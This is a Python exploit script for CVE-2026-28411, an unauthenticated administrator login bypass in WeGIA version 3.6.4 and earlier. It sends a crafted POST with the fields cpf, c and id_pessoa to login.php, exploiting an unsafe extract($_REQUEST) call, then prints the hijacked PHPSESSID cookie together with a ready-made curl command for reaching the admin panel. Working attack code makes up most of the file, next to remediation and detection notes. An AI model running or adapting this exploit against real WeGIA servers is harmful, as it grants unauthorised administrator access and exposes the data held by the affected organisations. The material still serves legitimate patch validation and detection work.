#!/usr/bin/env python3
# Exploit Title: WeGIA <= 3.6.4 Authentication Bypass to Admin Session
# CVE: CVE-2026-28411
# Date: 2026-02-27
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA
# Affected: WeGIA <= 3.6.4
# Tested on: WeGIA 3.6.4
# Category: Webapps
# Platform: PHP
# Exploit Type: Authentication Bypass
# CVSS: 9.8 (Critical)
# CWE: CWE-288, CWE-473
# Description: Unauthenticated admin login bypass via unsafe extract($_REQUEST) in login.php
# Fixed in: 3.6.5
# Usage:
# python3 exploit.py <target_url> [--admin-cpf ADMIN_CPF] [--admin-id ADMIN_ID]
#
# Examples:
# python3 exploit.py http://192.168.1.100/WeGIA/html/login.php
# python3 exploit.py https://target.com/wegia/html/login.php --admin-cpf admin --admin-id 1
#
# Options:
# --admin-cpf Known or guessed admin CPF/login (default: admin)
# --admin-id Admin user ID to impersonate (default: 1)
#
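# Notes:
# - Exploits unsafe extract($_REQUEST) to overwrite login variables
# - Sets admin session directly without password check
# - After success, returned cookies can be used for full admin access
# - Remediation: upgrade to 3.6.5 or later (see "Fixed in" above)
# - Detection: review requests to login.php that carry the "c" and "id_pessoa"
#   parameters (the fields sent in the payload built by exploit() below)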
#
# How to Use
#
# Step 1: Run the script against the target login endpoint
# Step 2: If successful → copy the PHPSESSID cookie
# Step 3: Use cookie in browser or requests to access admin panel
#
# Author banner. This print sits at module top level, ahead of the imports and
# outside the __main__ guard, so it is emitted whenever the file is loaded,
# including when it is imported rather than run as a script.
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║
║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║
║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║
║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║
║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║
║ ║
║ b a n y a m e r _ s e c u r i t y ║
║ ║
║ >>> Silent Hunter • Shadow Presence <<< ║
║ ║
║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ CVE-2026-28411 • WeGIA Auth Bypass ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import argparse
import requests
import sys
from urllib.parse import urljoin
def exploit(target_url: str, admin_cpf: str = "admin", admin_id: str = "1") -> None:
    """Send one login POST with the CVE-2026-28411 fields and print the outcome.

    Posts ``cpf``, ``c`` and ``id_pessoa`` (no password field) to ``login.php``
    under *target_url* without following redirects. A 301/302 response is
    reported as a likely bypass and the session's cookies are printed; any
    other status prints the first 400 characters of the response body.

    Per the file header, the root cause is ``extract($_REQUEST)`` in
    login.php, which lets request fields overwrite the script's own variables.
    The header lists 3.6.5 as the fixed release.

    Args:
        target_url: URL to which ``login.php`` is appended as the final path
            segment.
        admin_cpf: Value sent in the ``cpf`` field.
        admin_id: Value sent in the ``id_pessoa`` field.

    Returns:
        None. All results are written to stdout.

    Raises:
        SystemExit: with status 1 when the request raises
            ``requests.RequestException``.
    """
    session = requests.Session()
    # The target is forced to end in "/" so urljoin appends login.php instead
    # of replacing the last path segment.
    login_url = urljoin(target_url.rstrip('/') + '/', "login.php")
    # These three form fields are the whole request signature. For detection:
    # a login.php request carrying "c" and "id_pessoa" with no password field
    # is the pattern to look for. PHP's $_REQUEST is populated from more than
    # the POST body (query string, and cookies depending on request_order), so
    # log review should not be limited to POST bodies.
    payload = {
        "cpf": admin_cpf,
        "c": "true",
        "id_pessoa": admin_id,
    }
    print(f"[*] Targeting: {login_url}")
    print(f"[*] Using payload: cpf={admin_cpf}, c=true, id_pessoa={admin_id}")
    try:
        # Redirects are not followed so the status and Location header of the
        # first response can be inspected directly.
        response = session.post(
            login_url,
            data=payload,
            allow_redirects=False,
            timeout=10
        )
        print(f"[*] Status code: {response.status_code}")
        # NOTE(review): a 3xx by itself does not show which account, if any,
        # the session is bound to. How a patched or failing login.php responds
        # is not shown here and it may also redirect, so treat this branch as
        # an indicator rather than confirmation; when validating a fix, check
        # the installed version (>= 3.6.5 per the header).
        if response.status_code in (301, 302):
            location = response.headers.get("Location", "N/A")
            cookies = session.cookies.get_dict()
            print("[+] SUCCESS: Authentication bypass appears successful")
            print(f" Redirect: {location}")
            print(f" Cookies set: {cookies}")
            if "PHPSESSID" in cookies:
                # The session id is written to stdout in clear text. Treat
                # terminal scrollback and captured logs as holding a live
                # credential and invalidate the session once testing ends.
                print("\n[+] Admin session cookie obtained!")
                print(" PHPSESSID =", cookies["PHPSESSID"])
                print("\nNext step: Use this cookie to access the admin panel:")
                print(f" Cookie: PHPSESSID={cookies['PHPSESSID']}")
                print(f" Example curl:")
                print(f" curl -b \"PHPSESSID={cookies['PHPSESSID']}\" {urljoin(target_url.rstrip('/') + '/', 'index.php')}")
        else:
            print("[-] Failed to bypass authentication")
            print(f" Response snippet:\n{response.text[:400]}...")
    except requests.RequestException as e:
        # Connection, TLS and timeout failures all end up here; the process
        # exits non-zero instead of returning to the caller.
        print(f"[!] Error: {e}")
        sys.exit(1)
if __name__ == "__main__":
    # Command-line entry point: one positional target plus two optional
    # overrides, forwarded unchanged to exploit().
    cli = argparse.ArgumentParser(
        description="CVE-2026-28411 WeGIA Authentication Bypass Exploit",
    )
    cli.add_argument(
        "target",
        help="Target base URL (e.g. http://target.com/WeGIA/)",
    )
    # Both optional flags share the same shape: a string default and help text.
    for flag, fallback, text in (
        ("--admin-cpf", "admin", "Admin CPF/login to impersonate"),
        ("--admin-id", "1", "Admin user ID to set"),
    ):
        cli.add_argument(flag, default=fallback, help=text)
    opts = cli.parse_args()
    exploit(opts.target, opts.admin_cpf, opts.admin_id)